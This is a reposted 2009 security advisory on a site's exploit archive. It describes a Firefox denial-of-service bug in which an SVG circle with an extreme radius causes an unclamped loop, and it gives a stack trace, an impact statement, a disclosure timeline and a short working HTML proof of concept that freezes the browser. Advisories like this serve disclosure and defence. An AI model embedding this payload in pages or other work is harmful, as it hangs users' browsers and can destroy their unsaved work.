首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox (unclamped loop) Denial of Service Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-05-27  
                           From the low-hanging-fruit-department 
     Firefox et al. Denial of Service - All versions supporting SVG
________________________________________________________________________

CHEAP Plug :
************************************************************************
You are invited to participate in HACK.LU 2009, a small but concentrated
luxemburgish security conference. More information : http://www.hack.lu
CFP is open, sponsorship is still possible and warmly welcomed!
************************************************************************

Release mode: Forced release.
Ref         : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG
WWW         : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html
Vendor      : http://www.firefox.com
Status      : No patch
CVE         : none provided
Credit      : none 
Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615

Security notification reaction rating : There wasn't any reaction. OSS Security notification FTW
Notification to patch window : x+n

Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products : 
- Firefox all supporting SVG (didn't care to investigate which, task of the vendor)
- all software packages using mozilla engine and allowing SVG

I. Background
~~~~~~~~~~~~
Firefox is a popular internet browser.

II. Description
~~~~~~~~~~~~~~
This bug is a typical result of what we call unclamped loop. An "attacker"
will give the Radius value of the Circle attribute a very big value. That
is leetness. 

Stack trace : 
ntkrnlpa.exe+0x6e9ab
ntkrnlpa.exe!MmIsDriverVerifying+0xbb0
hal.dll+0x2ef2
xul.dll!NS_InvokeByIndex_P+0x30c36
xul.dll!NS_InvokeByIndex_P+0x30e8a
xul.dll!NS_InvokeByIndex_P+0x30e02
xul.dll!NS_InvokeByIndex_P+0x30f5e
xul.dll!XRE_InitEmbedding+0x7858
xul.dll!XRE_InitEmbedding+0xf4ee
xul.dll!XRE_TermEmbedding+0x11411
xul.dll!gfxTextRun::Draw+0xdd4d
xul.dll!gfxTextRun::Draw+0xe1ca
xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495
xul.dll!gfxTextRun::SetSpaceGlyph+0x2678
xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3
xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6
xul.dll!NS_StringCopy_P+0x9942
xul.dll!gfxImageSurface::gfxImageSurface+0x3188
xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8


Also produces exceptions in MOZCRT19...
MOZCRT19!modf+0x2570:
600715e0 660f122550450960 movlpd  xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef

III. Impact
~~~~~~~~~~
Browser doesn't respond any longer to any user input, all tabs are no 
longer accessible, your work if any  (hail to the web 2.0) might be lost.

IV. Proof of concept (hold your breath)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
</head>
<body>
<svg xmlns='http://www.w3.org/2000/svg'><circle cx='10' cy='10' r='1.79769313486231E+308' fill='red' /></svg>
</body></html>

IV. Disclosure timeline
~~~~~~~~~~~~~~~~~~~~~~~~
DD/MM/YYYY
18/11/2008 : Created bugzilla entry (security) with proof of concept, 
             description the terms under which ooperate and the planned disclosure date.

24/22/2008 : Daniel Veditz comments : "Might be a cairo bug rather than SVG 
             (seems to be looping in libthebes), but I can definitely confirm 
                         the DoS.
                          
14/12/2008 : Ask for any action plan and my assessement of considering it low risk

             No reply.

28/12/2008 : "Timeless" comments [..] personally, i intend to open this bug 
             to the public [..] a bug like this is more likely to be fixed 
                         by being visible to more people than by leaving it in a closet.
                         
26/05/2009 : In 2009 I agree; release of this advisory. 

# [2009-05-26]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eZoneScripts Hotornot2 Script
·Ultimate Media Script 2.0 Remo
·Webradev Download Protect 1.0
·Gallarific (user.php) Arbirary
·Wordpress Plugin Lytebox (wp-l
·RoomPHPlanning 1.6 Multiple Re
·cpCommerce 1.2.x GLOBALS[prefi
·Safari RSS feed:// Buffer Over
·Slayer 2.4 (skin) Universal Bu
·PHP <= 5.2.9 Local Safemod Byp
·Mole Adult Portal Script (prof
·Flax Article Manager 1.1 (Cook
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved